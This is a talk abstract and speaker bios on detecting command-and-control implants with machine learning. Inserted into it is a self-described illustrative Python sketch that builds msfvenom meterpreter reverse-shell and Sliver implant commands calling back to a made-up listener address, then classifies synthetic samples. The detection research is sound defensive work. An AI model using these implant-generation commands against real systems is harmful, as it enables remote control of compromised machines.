Thursday 5 October 16:00 - 16:30, Red room
Sebastiano Mariani, Oleg Boyarchuk, Stefano Ortolani & Giovanni Vigna (VMware)
Command-and-control (C2) frameworks are used to remotely manage and maintain access to compromised devices. C2 frameworks are routinely used for legitimate penetration testing with the goal of helping organizations improve their defences and better protect against real-world attacks.
To simulate the polymorphic nature of modern threats, C2 frameworks often support the creation of custom payloads that can be used to simulate specific types of attacks. These payloads can be used to test the effectiveness of endpoint security products, network-based intrusion detection systems, and other types of security measures.
Unsurprisingly, cybercriminals immediately took advantage of the opportunity to use effective and well-maintained implants and their management tools for malicious purposes, especially because custom implants can be generated for each attack. As a result, frameworks such as Cobalt Strike, Metasploit and Sliver have increasingly been used in the process of breaching enterprise networks.
This talk introduces a novel approach to detecting C2 implants at scale, which uses the customization techniques implemented by the C2 frameworks as a means to support effective detection. In particular, we developed a “framework for the analysis of C2 frameworks”, called C2F2, that leverages the ability of C2 frameworks to generate custom implants to automatically synthesize large datasets of implants, which are then used to derive detection procedures based on machine learning techniques.
We present a comprehensive analysis of all the implants generated by 10 of the most widely used C2 frameworks (both commercial and open source). For each framework, we detail all possible configuration options and how they can be used to morph the binary footprint of an implant. We then describe our automated implant-generation harness, which allows for the programmatic generation of thousands of variations of C2 implants, creating datasets suitable for the application of machine learning techniques. Finally, we present the results of our detection procedure, which show that it is possible not only to detect the implants with high precision but also to determine to which C2 framework they belong, supporting improved threat intelligence.
Alongside this talk, we release C2F2 on GitHub together with plug-ins to instrument all the C2 frameworks mentioned in this presentation. Each plug-in is paired with instructions on how to programmatically explore a large space of configuration options when generating implants. We also provide sample implant datasets for each analysed C2 framework.
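The pipeline the paragraph describes, reduced to a runnable sketch as an added example that is neither C2F2's code nor part of the original abstract: a plug-in declares a framework's option space, the harness enumerates every combination into a build command (the msfvenom flags and the Sliver `generate` console flags are real; the listener address 10.0.0.5 is made up), and a nearest-centroid classifier over byte-histogram and entropy features attributes held-out samples to a framework. Because no C2 framework is run here, the implant bytes are constructed stand-ins, and the feature set is an assumption: the talk does not say which features C2F2 uses.

```python
"""Configuration-space exploration and framework attribution for C2 implants.

Added illustration for this abstract, not C2F2 code. The msfvenom flags and the
Sliver console `generate` flags are real; the plug-in layout, listener address,
sample bytes and feature set are assumptions made for this example."""
import itertools
import math
import random
from collections import Counter
from typing import Dict, Iterator, List, Sequence, Union

# Hypothetical per-framework configuration spaces (real option names).
CONFIG_SPACES: Dict[str, Dict[str, Sequence]] = {
    "metasploit": {
        "payload": ["windows/x64/meterpreter/reverse_tcp",
                    "windows/x64/meterpreter/reverse_https"],
        "encoder": ["x64/xor", "x64/zutto_dekiru"],
        "iterations": [1, 3, 5],
        "format": ["exe", "dll"],
    },
    "sliver": {"arch": ["amd64", "386"], "format": ["exe", "shared"], "evasion": [False, True]},
}
C2_HOST = "10.0.0.5"  # made-up listener address

def enumerate_configs(space: Dict[str, Sequence]) -> Iterator[Dict]:
    """Cartesian product over every option: one dict per implant variant."""
    keys = list(space)
    for values in itertools.product(*(space[k] for k in keys)):
        yield dict(zip(keys, values))

def build_command(framework: str, cfg: Dict, out: str) -> Union[List[str], str]:
    """Map a config to the command that produces the implant: an argv list for
    msfvenom, or a Sliver operator-console line (sent via the gRPC API in a real run)."""
    if framework == "metasploit":
        return ["msfvenom", "-p", cfg["payload"], f"LHOST={C2_HOST}", "LPORT=443",
                "-e", cfg["encoder"], "-i", str(cfg["iterations"]),
                "-f", cfg["format"], "-o", out]
    if framework == "sliver":
        line = (f"generate --os windows --arch {cfg['arch']} --format {cfg['format']} "
                f"--mtls {C2_HOST}:8888 --save {out}")
        return line + " --evasion" if cfg["evasion"] else line
    raise ValueError(f"no plug-in for {framework}")

def synth_implant(framework: str, seed: int) -> bytes:
    """Constructed stand-in for a generated binary so the pipeline runs offline:
    encoded Metasploit output is near-uniform, a Go-built Sliver implant is
    dense with runtime symbol strings."""
    rng = random.Random(seed)
    noise = bytes(rng.getrandbits(8) for _ in range(1024))
    if framework == "metasploit":
        return b"MZ" + noise + noise[::-1]
    symbols = [b"runtime.newproc", b"net/http.(*Client).Do", b"crypto/tls.(*Conn).Write"]
    return b"MZ" + b"".join(noise[i:i + 8] + rng.choice(symbols) for i in range(0, 1024, 8))

def features(blob: bytes) -> List[float]:
    """Normalised 256-bin byte histogram plus Shannon entropy scaled to [0, 1]."""
    n = len(blob) or 1
    counts = Counter(blob)
    hist = [counts.get(b, 0) / n for b in range(256)]
    entropy = -sum(p * math.log2(p) for p in hist if p > 0)
    return hist + [entropy / 8.0]

class NearestCentroid:
    """Minimal attribution classifier: predict the label of the closest class mean."""
    def fit(self, X, y):
        self.centroids = {}
        for label in set(y):
            rows = [x for x, l in zip(X, y) if l == label]
            self.centroids[label] = [sum(col) / len(rows) for col in zip(*rows)]
        return self

    def predict(self, x):
        return min(self.centroids, key=lambda l: math.dist(x, self.centroids[l]))

def build_dataset(n_per_config: int = 2):
    """Label every synthesised variant with the framework that produced it."""
    X, y = [], []
    for fi, (fw, space) in enumerate(CONFIG_SPACES.items()):
        for ci, _cfg in enumerate(enumerate_configs(space)):
            for r in range(n_per_config):
                X.append(features(synth_implant(fw, seed=100000 * fi + 1000 * ci + r)))
                y.append(fw)
    return X, y

def attribution_accuracy() -> float:
    """Train on even-numbered samples, attribute the held-out odd ones."""
    X, y = build_dataset()
    clf = NearestCentroid().fit(X[::2], y[::2])
    hits = sum(clf.predict(x) == l for x, l in zip(X[1::2], y[1::2]))
    return hits / len(X[1::2])

if __name__ == "__main__":
    for fw, space in CONFIG_SPACES.items():
        print(fw, len(list(enumerate_configs(space))), "variants; e.g.",
              build_command(fw, next(enumerate_configs(space)), f"out/{fw}_0"))
    print("attribution accuracy:", attribution_accuracy())
```

In a lab range, `synth_implant` is the part to replace with the bytes of the file each command actually produced; the enumeration, labelling and attribution steps stay the same, and a richer feature set (section layout, imports, strings) will be needed once implant configurations start overlapping in byte statistics.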
Sebastiano Mariani is a threat researcher at VMware with a keen interest in developing custom tools and infrastructure to aid security researchers in their work. He also enjoys malware analysis and reverse engineering. Previously, he worked as a researcher in Seclab at the University of California, Santa Barbara. He has presented his work at a variety of industry and academic conferences, including Black Hat, ICSE and DIMVA.
Oleg Boyarchuk is a threat researcher at VMware. Oleg is passionate about malware, vulnerabilities, reverse engineering, and Windows internals. Prior to joining VMware he worked as a reverse engineer at Lastline, where he was responsible for malware research and detection improvements. Before that he worked as a kernel driver developer at Avira, developing the core functionality of Avira Antivirus.
Stefano Ortolani is Threat Research Lead at VMware, formerly Director of Threat Research at Lastline, where he started in 2015 as a security researcher. In his current role, Stefano focuses on finding novel approaches to investigate, classify and detect unknown cyber tradecraft. Prior to Lastline, he was part of the Global Research and Analysis Team at Kaspersky Lab, in charge of fostering operations with CERTs, governments, universities and law enforcement agencies, as well as conducting research into the global threat landscape. He received his Ph.D. in computer science from VU University Amsterdam. Stefano is a regular speaker at technical conferences and has authored/co-authored numerous research papers presented at venues such as Virus Bulletin, Security Analyst Summit, Underground Economy and Black Hat.
Giovanni Vigna is the Sr. Director of Threat Intelligence at VMware. He is also a professor in the Department of Computer Science at the University of California, Santa Barbara. His research interests include malware analysis, vulnerability assessment, the underground economy, binary analysis, web security, and the applications of machine learning to security problems. Giovanni is also the founder of the Shellphish hacking group, which has participated in more DEF CON CTF competitions than any other group in history. He is an IEEE Fellow and an ACM Fellow.